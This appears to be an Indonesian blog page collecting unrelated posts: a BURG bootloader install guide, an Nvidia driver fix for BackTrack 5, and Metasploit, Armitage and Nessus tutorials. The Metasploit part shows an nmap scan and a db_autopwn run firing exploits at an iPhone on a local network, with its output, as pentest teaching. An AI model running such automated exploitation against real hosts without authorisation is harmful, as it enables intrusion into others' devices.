install burg di ubuntu

BURG
BURG
BURG (Brand-new Universal loadeR from GRUB) adalah boot loader dengan tampilan grafis yang berbasis pada GRUB. BURG pada dasarnya sama saja dengan GRUB, yaitu berguna untuk menampilkan menu pilihan sistem operasi pada saat booting, tetapi BURG memiliki kelebihan yang tidak ada pada GRUB yaitu memiliki interface yang bisa di ubah-ubah konfigurasinya.

Install BURG di Ubuntu

Untuk menginstall BURG di Ubuntu, sesuaikan dulu dengan Ubuntu yang Anda gunakan,
Untuk menginstall BURG pada Ubuntu 10.04 atau 10.10, buka Terminal dan jalankan perintah berikut ini satu-per-satu:
  • Ubuntu 10.04 dan 10.10

sudo add-apt-repository ppa:bean123ch/burg
sudo apt-get update
sudo apt-get install burg burg-common burg-emu burg-pc burg-themes burg-themes-common
Untuk menginstall BURG pada Ubuntu 11.04 atau 11.10, buka Terminal dan jalankan perintah berikut ini satu-per-satu:
  • Ubuntu 11.04 dan 11.10

sudo add-apt-repository ppa:n-muench/burg
sudo apt-get update
sudo apt-get install burg burg-common burg-emu burg-pc burg-themes 
burg-themes-common
Selama proses instalasi berlangsung, akan muncul sebuah jendela Terminal seperti ini:
BURG Conf
Tekan tombol dan sorot OK kemudian Enter.
Selanjutnya akan muncul seperti ini:
BURG conf
Tekan tombol dan sorot OK kemudian Enter.
Pada tahap instalasi di harddisk, akan muncul seperti ini:
GRUB conf
Anda sebaiknya pilih paling atas saja (/dev/sda) lalu klik Forward.
Catatan:
Jika seandainya Anda melewati tahap Configuring burg-pc diatas atau karena memang jendela tersebut tidak muncul, Anda tetap bisa menginstall nya ke harddisk secara manual, caranya adalah dengan menjalankan perintah dibawah ini:
sudo burg-install "(hd0)"
Setelah rangkaian proses diatas terlewati dengan sukses, buka Terminal kembali dan jalankan perintah berikut:
sudo update-burg
Untuk mengecek apakah BURG sudah sukses terinstall Anda bisa menjalankan perintah ini:
sudo burg-emu
Kalau sudah muncul tampilan seperti dibawah ini berarti instalasinya sukses:
BURG emu

Konfigurasi BURG

Pada saat booting dan BURG tampil, Anda bisa menggunakan shortcut keyboard berikut ini untuk mengubah konfigurasi dari BURG:
  • F2 atau T : Mengubah theme
  • F3 atau R : Mengubah resolusi BURG
  • F7 : Untuk menampilkan / menyembunyikan entry grub yang jarang digunakan
  • F9 : Shutdown
  • F10 : Reboot
  • C : Membuka Terminal
  • E : Mengedit entry grub

Mengubah resolusi BURG

Jika karena suatu sebab resolusi tampilan dari BURG kekecilan atau tidak sesuai dengan resolusi monitor Anda, Anda bisa mengedit konfigurasinya langsung.
Buka Terminal, dan jalankan perintah berikut ini:
gksu gedit /etc/default/burg
Pada baris ke 21, edit baris GRUB_GFXMODE= dan ganti dengan ukuran resolusi monitor Anda. Contoh, resolusi monitor laptop saya adalah 1366×768, maka saya akan mengeditnya menjadi GRUB_GFXMODE=1366x768
GRUB conf
Setelah itu Save dan Close. Buka Terminal dan jalankan:
sudo update-burg
sudo burg-emu

Menambahkan tema untuk BURG

Seperti yang sudah saya jelaskan di awal, kelebihan BURG dibanding GRUB adalah adanya interface yang bisa diubah-ubah sesuai dengan keinginan kita. BURG bisa kita ubah tampilannya dengan cara mengganti temanya.
Secara default BURG sudah menyediakan beberapa tema standar, tetapi Anda juga masih bisa menambahkan tema lain yang didownload dari internet.
Contohnya:
  • Download lah tema BURG berjudul achromatic for burg dari halaman ini.
  • Setelah file nya terdownload, extract hingga menghasilkan sebuah folder baru bernama achromatic.
  • Tekan Alt-F2 dan ketik gksu nautilus /boot/burg/themes/ lalu Enter.
  • Setelah jendela Nautilus (File Manager) terbuka, copy folder achromatic ke dalam /boot/burg/themes/, kemudian tutup Nautilus.
  • Buka Terminal dan jalankan:
  • sudo update-burg
    sudo burg-emu
    Periksa apakah tema BURG yang barusan Anda install sudah masuk dalam daftar pemilihan tema.
BURG themes
Jika masih bingung atau ada yang mau Anda tanyakan, silakan berikan komentar :) .
Referensi:
https://help.ubuntu.com/community/Burg
[Fixed] Install Nvidia driver di Backtrack 5 R1

[Fixed] Install Nvidia driver di Backtrack 5 R1

Ini barusan ane install ulang BT5 pake yg R1 trus mau install driver Nvidia buat vga laptop Geforce GT240M pake cara yang lama ga bisa, karena ada tulisan error “kernel is using nouveau and it incompatible with nvidia…bla..bla…”
Googling dikit ane nemu ternyata caranya:

buka file blacklist.conf

 
vim /etc/modprobe.d/blacklist.conf

tambah line berikut kemudian save:

 
blacklist vga16fb
blacklist nouveau
blacklist rivafb
blacklist nvidiafb
blacklist rivatv

lalu uninstall semua yg ada tulisan nvidia:

 
apt-get --purge remove nvidia-*

Reboot…
setelah reboot tambahin repository berikut:

 
add-apt-repository ppa:ubuntu-x-swat/x-updates

setelah itu update dan lakukan install driver Nvidia dari repository diatas:

 
apt-get update && apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

selesai??
Reboot lagi, kemudian lakukan:

 
nvidia-xconfig 
 
perintah diatas utk membuat file xorg.conf yg baru di folder /etc/X11


sumber
http://ewangi.info/660/backtrack-5r1-first-hot-review-bugs-fixes/
Tutorial Metasploit

Tutorial Metasploit

Metasploit exploit tool is one that is included in the backtrack, the following tutorial in exploiting the use metasploit backtrack system.scenarionya machine with 5 connected to the access point firmware 4.0.2 iphone via ssh wifi.Target actively connected via wifi to access the same pointroot@leak#msfconsole

   =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 697 exploits - 358 auxiliary - 54 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r12973 updated today (2011.06.18)

msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect -y /opt/framework3/config/database.yml
[*] Using database driver postgresql
 (catatan : db_connect mesti di set manual ke folder databasenya)

[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-06-19 21:14 CIT
[*] Nmap: Nmap scan report for 192.168.10.100
[*] Nmap: Host is up (0.0075s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT      STATE SERVICE
[*] Nmap: 22/tcp    open  ssh
[*] Nmap: 62078/tcp open  iphone-sync
[*] Nmap: MAC Address: E8:06:88:7C:8D:89 (Apple )
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.22 seconds
(scanning dengan nmap,ada banyak opsi untuk scan dengan nmap,terlihat port 22 dan 62078 terbuka)
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -t -e -p
[*] Analysis completed in 20 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.10.100:22  exploit/windows/ssh/freeftpd_key_exchange  (port match)
[*]   192.168.10.100:22  exploit/windows/ssh/freesshd_key_exchange  (port match)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/ssh/freeftpd_key_exchange against 192.168.10.100:22...
[*] (2/2 [0 sessions]): Launching exploit/windows/ssh/freesshd_key_exchange against 192.168.10.100:22...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions

(db_autopwn msf3 used to use script automatically choose the appropriate exploits to target and open ports, from the above target for exploits is not vulnerable because there is no session is obtained)

sourece>> http://mangnik.blogspot.com/2011/08/tutorial-metasploit.html

with translate

Metasploit Tutorials From Beginner to Advance

-metaspoit


If you are active in the community of Penetration tester/ethical hacker than you have heard about metasploit, because it is the most famous tool and used by the most penetration tester as well as used by the hackers. Metasploit is an open source security (Computer) project that contain the information about vulnerabilities.
If you just put all the available exploit in a single place than the phenomena of metasploit occur.

Metasploit framework is a sub project and is use to execute exploit code against a machine and get the desire task done.

Before discussing how to do all the things, you need to understand some basic terms like, vulnerability, exploit and payload. Vulnerability is a weakness or a hole by which an attacker can compromise a machine. Exploit may be a piece of code is an attack that takes advantage of a vulnerabilityA payload is the piece of software that lets you control a computer system after it’s been exploited.

Metasploit project provides metasploit pro, metasploit express and metasploit framework. Metasploit framework is an open source and available for free for cross operating system platform (Windows, Linux).


How To Install Metaspolit 
 
In this tutorial we will discuss how to get and install metasploit framework for both Windows and for Linux (like ubuntu), if you are using backtrack than you can find metasploit over there.  
Install Metasploit on ubuntu:

We need some packages to install metasploit, open terminal and type exactly.
$ sudo apt-get install ruby libruby rdoc
$ sudo apt-get install libyaml-ruby
$ sudo apt-get install libzlib-ruby
$ sudo apt-get install libopenssl-ruby
$ sudo apt-get install libdl-ruby
$ sudo apt-get install libreadline-ruby
$ sudo apt-get install libiconv-ruby
$ sudo apt-get install rubygems
Click here to download metasploit, in this case we have downloaded Linux-full.run file. You need to become a root user to run this installation on the terminal type.
$ sudo su
Now locate the directory where you have downloaded metasploit before and type.
$ ./name_of_file.run


Now just forward it accept the agreement, after installation, to run metasploit on the terminal type.
$ msfconsole
Install Metasploit on Windows:
If you want to install metasploit on windows than you need to download the executable file of metasploit click here to download:  The installer includes the packages 
  • Console2
  • Ruby 1.9.2
  • PostgreSQL
  • Java JDK 6
  • Subversion
  • VNCViewer
  • WinVI32
  • Nmap 5.6
So you dont need to download any other file, just run the installer and you are done!


-armitage
Technology has no end, on the previous article we have discussed about metasploit framework, that has been changed the way of penetration testing, Armitage is a graphical cyber attack management tool for Metasploit that visualises your targets, recommends exploits, and exposes the advanced capabilities of the framework.




When metasploit and armitage meet to each other than they make a powerful cyber management tool for doing pen testing on the network(s). Armitage allow your team to use the same sessions, share data, and communicate through one Metasploit instance. It is very helpful tool to learn about the cyber security because it provides a graphical interface instead of command line.

Just like metasploit, Armitage is also available for different operating system like Linux, Windows and MAC. Below is the tutorial on how to get and install armitage.


Tutorial
Requirement
Install Armitage On Linux 
You can get install armitage by a simple command but before execute this application get command you need to be a root user to install armitage so open terminal and type exactly,
$ sudo su
# apt-get install armitage
We need to enable RPC daemon for metasploit use this command on the terminal,
root@bt:~# msfrpcd -f -U msf -P test -t Basic
Now start MYSQL server so that Armitage stores results 
root@bt:~# /etc/init.d/mysql start
Now its time to run Armitage, locate the directory and type 
root@bt:/pentest/exploits/armitage# ./armitage.sh
After this a new window must be appear, setup the default host name if you want to use SSL than tick on it,




-Integrate Nessus With Metasploit- Tutorial

There are so many tools but the importance of Nessus as a vulnerability scanner is not hidden, and the metasploit master of all the tools that contain the available exploit makes it so important for penetration testing and for hacking, as discussed before about integration of nmap into nessus click here to learn.


This time we have decided to write on to use metasploit on the basis of nessus result, you can use your Linux box (recommended) as well as windows box, backtrack5 is available so if you are doing practice on backtrack machine than it is good, while I am using ubuntu for this tutorial.

This tutorial is linked with the previous tutorial in which I have shown you how to use nessus now I am suppose that you have a result on your nessus, so start metasploit,
$ msfconsole
In this process we make Nessus Bridge for Metasploit, so on the metasploit type.
msf > load nessus

After successfully login the plugin you need to run and import the result of nessus into metasploit, so first of all we have to connect our nessus server with metasploit here is the command,
msf > nessus_connect username:password@hostname:port
msf > nessus_connect ehacking:irfan@127.0.0.1:8834
After successful authentication you can check the status of your nessus scan, you can check the policy, you can pause and resume the scan, you can view add and delete user and in general you can do anything that you can do with nessus window.
If you want to check the server status than type
msf > nessus_server_status
Now come to the main objective of the article, below command is for check all the reports
msf > nessus_report_list 
If you want to know about the host from the report, 
msf > nessus_report_hosts <report id>
msf > nessus_report_hosts a6656thy45ehacking
If there is a need to find out the information from a particular host use the command below.
msf > nessus_report_host_ports <hostname> <report id>
msf > nessus_report_host_ports 192.168.1.1 a6656thy45ehacking
You can do a lot of different things from Nessus Bridge for Metasploit just type the command to know more about it.
msf > nessus_help

 

 

How To Use Armitage In Backtrack 5- Tutorial

There is no need to introduce armitage, if you are related to the world of penetration testing so you have an idea about armitage and if you are new to the world of ethical hacking than click here to learn about Armitage and click here for Metasploit.



Backtrack 5 is on fire now after installation backtrack 5, you need to setup armitage to perform a effective pen testing, if you are using some older version of backtrack and if you are using other Linux distro like ubuntu than click here to learn how to install armitage.
You dont need to install armitage on backtrack5 because it is available on backtrack5, just follow the steps to run armitage on bt5.
Requirement
  • Backtrack 5 (Click here to learn)
  • Java
  • Metasploit
  • MySQL
All the requirement is available on backtrack5, so you need not to worry about it.

  • Open your backtrack and click on Application --> backtrack --> Exploitation tools --> Network exploitation tools --> Metasploit framework --> Armitage



  • On the next windows click on connect to start armitage, if it is your first time than it may take some time to start armitage.


  • Now you will see the window of armitage, now your armitage is ready to use, if you dont know how to use it than you have to wait of or next article in which we will surely teach you how to use armitage by different variance.